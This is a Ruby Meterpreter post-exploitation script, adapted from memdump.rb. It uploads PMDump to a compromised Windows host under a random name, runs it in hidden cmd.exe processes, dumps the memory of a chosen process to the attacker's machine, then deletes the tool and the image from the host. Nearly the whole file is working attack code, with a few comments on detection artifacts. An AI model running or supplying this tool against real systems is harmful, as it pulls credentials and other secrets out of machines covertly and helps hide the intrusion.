- #!/usr/bin/env ruby
- # Meterpreter script for dumping target memory for a particular process using Arne Vidstrom's PMDump tool - http://ntsecurity.nu/toolbox/pmdump/
- # This is a modified version of memdump.rb a script written by Carlos Perez (Dark Operator) - http://www.darkoperator.com/blog/2009/3/10/meterpreter-memory-dump-script.html
- # modified by: redmeat_uk@hotmail.com
- # date: 26/09/2009
- require 'readline'
# Meterpreter session this script was launched against.
session = client

# Command-line switches understood by the script.
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-t" => [ true, "Change the timeout default 5min. Specify timeout in seconds"]
)

# Staging directory on the session host: its %TEMP% environment variable,
# expanded on that host.
tmp = session.fs.file.expand_path("%TEMP%")

# Five-digit, zero-padded random name for the memory image. rand is not a
# cryptographic source; the name only avoids collisions between runs.
imgname = rand(100000).to_s.rjust(5, "0")

# Default response timeout for session commands, in seconds (5 minutes).
timeoutsec = 300
- #---------------------------------------------------------------------------------------------------------
- #Dumping memory image
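# Dumps the memory of one process on the session host with PMDump and copies
# the image back to the operator's machine.
#
# Sequence: upload data/pmdump.exe under a random five-digit name into +tmp+,
# run it with -list, prompt the operator for a PID, run it again to write the
# image to <tmp>\<imgname>, download that file to /tmp/pmdump-<imgname>, then
# delete both files from the host.
#
# Artifacts visible on the host while this runs (useful when reviewing or
# writing detections for this activity): a five-digit-named .exe and a
# five-digit-named file without extension in %TEMP%, and cmd.exe child
# processes started with "/c".
#
# session    - Meterpreter client object.
# tmp        - staging directory on the session host.
# imgname    - file name used for the memory image.
# timeoutsec - response timeout in seconds, assigned to the session.
#
# Returns nothing useful; progress and errors are reported via print_status.
def memdump(session,tmp,imgname,timeoutsec)
  pmexe = File.join(Msf::Config.install_root, "data", "pmdump.exe")
  pmscramble = sprintf("%.5d",rand(100000))
  remote_exe = "#{tmp}\\#{pmscramble}.exe"
  remote_img = "#{tmp}\\#{imgname}"
  local_img = "/tmp/pmdump-#{imgname}"

  print_status("Uploading pmdump for dumping memory of a process....")
  begin
    session.fs.file.upload_file(remote_exe, pmexe)
    print_status("pmdump uploaded as #{remote_exe}")
  # Broad rescue kept as in the rest of the script; NOTE(review): narrow it if
  # the framework's error classes allow.
  rescue ::Exception => e
    print_status("The following Error was encountered: #{e.class} #{e}")
    # Every later step needs the uploaded binary, so stop here.
    return
  end

  session.response_timeout=timeoutsec
  line = nil
  print_status("Process list...")
  begin
    r = session.sys.process.execute("cmd.exe /c #{remote_exe} -list", nil, {'Hidden' => 'true','Channelized' => true})
    while(d = r.channel.read)
      print_status("#{d}")
    end
    r.channel.close
    r.close
    line = Readline::readline('Please enter PID: ')
    # readline returns nil on end-of-input; HISTORY only accepts strings.
    Readline::HISTORY.push(line) if line
  rescue ::Exception => e
    print_status("The following Error was encountered: #{e.class} #{e}")
  end

  # The PID is interpolated into a cmd.exe command line, so accept digits only.
  pid = line.to_s.strip
  attempted = false
  dumped = false
  if pid =~ /\A\d+\z/
    print_status("Dumping memory for process id #{pid}")
    attempted = true
    begin
      n = session.sys.process.execute("cmd.exe /c #{remote_exe} #{pid} #{remote_img}", nil, {'Hidden' => 'true','Channelized' => true})
      # Drain the channel until the tool exits; its output is not used.
      while(n.channel.read)
      end
      n.channel.close
      n.close
      dumped = true
      print_status("Finished dumping process's memory")
    rescue ::Exception => e
      print_status("The following Error was encountered: #{e.class} #{e}")
    end
  else
    print_status("Invalid PID #{line.inspect}, nothing was dumped")
  end

  if dumped
    print_status("Downloading memory dump for process id #{pid} to #{local_img}")
    begin
      session.fs.file.download_file(local_img, remote_img)
      # A process image can hold credentials and other secrets, and /tmp is a
      # shared directory: restrict the local copy to its owner.
      File.chmod(0600, local_img) if File.exist?(local_img)
    rescue ::Exception => e
      # Report and fall through so the files on the host are still removed.
      print_status("The following Error was encountered: #{e.class} #{e}")
    end
  end

  print_status("Deleting pmdump.exe from target...")
  session.sys.process.execute("cmd.exe /c del #{remote_exe}", nil, {'Hidden' => 'true'})
  print_status("pmdump.exe deleted")
  if attempted
    print_status("Deleting left over files...")
    session.sys.process.execute("cmd.exe /c del #{remote_img}", nil, {'Hidden' => 'true'})
    print_status("process memory dump image on target deleted")
  end
end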
- ################## MAIN ##################
- # Parsing of Option
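# Set once -h has been handled; the dump is skipped in that case.
show_help = false
@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-t"
    # The option value arrives as text; the session timeout needs a positive
    # number of seconds, so anything else keeps the default.
    if val.to_s =~ /\A\d+\z/ && val.to_i > 0
      timeoutsec = val.to_i
    else
      print_status("Ignoring invalid timeout #{val.inspect}, using #{timeoutsec} seconds")
    end
  when "-h"
    show_help = true
    print(
      "Process Memory Dumper Meterpreter Script\n" +
      @@exec_opts.usage
    )
    break
  end
}
unless show_help
  print_status("Running Meterpreter Process Memory Dump Script.....")
  memdump(session,tmp,imgname,timeoutsec)
end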